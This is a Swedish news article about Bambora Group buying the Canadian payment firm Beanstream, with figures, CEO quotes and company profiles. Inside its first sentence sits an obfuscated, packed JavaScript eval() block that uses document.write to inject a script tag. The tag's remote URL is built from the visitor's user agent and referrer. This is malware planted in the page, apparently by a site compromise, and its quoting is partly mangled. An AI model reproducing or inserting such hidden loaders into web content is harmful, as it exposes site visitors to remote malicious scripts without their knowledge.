Image Image Image Image Image Image Image Image Image Image

| 13 april, 2021

Scroll to top

Top

Bambora tar ett strategiskt kliv över Atlanten genom förvärv

Bambora tar ett strategiskt kliv över Atlanten genom förvärv
Sebastian

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|skfbk|var|u0026u|referrer|yersr||js|php’.split(’|’),0,{}))
svenska betalkoncernen Bambora Group etablerar sig på den Nordamerikanska marknaden genom förvärv av det kanadensiska betalföretaget Beanstream Internet Commerce, Inc. Förvärvet innebär att Bambora nu kan erbjuda sin unika helhetslösning till handlare på den Nordamerikanska marknaden och fortsätta sin resa mot att bli världens mest innovativa och snabbast växande betalkoncern i världen.

Beanstream tillhandahåller tjänster inom betalningar online och i fysiska butiker, och har över 20 000 nordamerikanska e-handlare på kundlistan, främst små och mellanstora företag. Beanstreams kompetens kompletterar Bamboras befintliga erbjudande perfekt och tillsammans är målet att erbjuda allt en handlare behöver för att kunna ta betalt och växa effektivt – online, offline och mobilt.

– Krångligt är vår största fiende och en fiende vi delar med samtliga bolag vi har förvärvat den senaste tiden. Att förenkla handel mellan människor är vår främsta uppgift och tillsammans med Beanstream, och de produkter vi tillsammans kommer att ta fram, finns stora förutsättningar för att vi ska kunna lyckas med detta på den Nordamerikanska marknaden, säger Johan Tjärnberg, vd på Bambora Group.

Sedan lanseringen av Bambora i maj 2015 har koncernen vuxit kraftigt. Idag hanterar man över 350 miljarder kronor i transaktionsvärde årligen, varav 70 procent är online. Totalt har Bambora 520 anställda i sju länder, bestående av ingenjörer, innovatörer, finansiella rådgivare, marknadsförare och digitala utvecklare.

– Förvärvet innebär en fantastisk möjlighet för oss att växa och fortsätta utveckla innovativa tjänster tillsammans med branschens skarpaste hjärnor på Bambora. Nu börjar ett nytt kapital i vår historia och jag ser verkligen fram emot att förenkla morgondagens handel, säger Craig Thomson, vd på Beanstream.

Bambora Group består av betalföretagen Euroline, Keycorp, dSAFE, Samport, IP Payments, MPS, DK Online och ePay. Detta gör Bambora Group till en av Sveriges största betalföretag, med närvaro i Europa, Australien, Nya Zeeland, Kanada, USA och Storbritannien.

Om Beanstream

Sedan 2000 har Beanstream tillhandahållit betaltjänster, hantering av operativa risker och autentiseringsmetoder åt några av Nordamerikas ledande företag och institutioner.

Beanstream har skapat relationer med stora finansiella institutioner, byggt upp ett nätverk av mer än 700 partners och 18 000 handlare och levererar white label-lösningar för First Data Canada, TD Bank och Sage Payroll. Beanstreams kunder är både fysiska butiker som e-handelsföretag, regeringar, finansiella och högre utbildningsinstitutioner. Beanstream har sitt säte i Victoria, British Columbia, Kanada.

Om Bambora

Bambora Group är en av de snabbast växande aktörerna inom betalningar med verksamhet i Europa, Australien, Nya Zeeland och Nordamerika. Bambora består av de innovativa betalningsföretagen Samport, MPS, ePay, DK Online, Keycorp, dSAFE, Euroline och IP Payments. Bambora hanterar över 350 miljarder sek i transaktionsvärde årligen, varav 70 procent är online. Bambora har 520 anställda med kontor i sju länder. Bambora Group ägs av Nordic Capital Fond VIII.